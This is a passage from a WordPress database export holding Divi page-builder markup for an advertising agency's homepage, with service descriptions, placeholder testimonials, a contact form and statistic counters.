use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-18 21:46:11','2020-07-18 21:46:11','',134,'https://52.66.212.87/2020/07/18/134-revision-v1/',0,'revision','',0),(349,1,'2020-07-18 21:53:38','2020-07-18 21:53:38','Creative services background image','creative services','','inherit','open','closed','','artboard-4','','','2020-07-18 21:54:06','2020-07-18 21:54:06','',0,'https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png',0,'attachment','image/png',0),(353,1,'2020-07-18 22:01:22','2020-07-18 22:01:22','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" 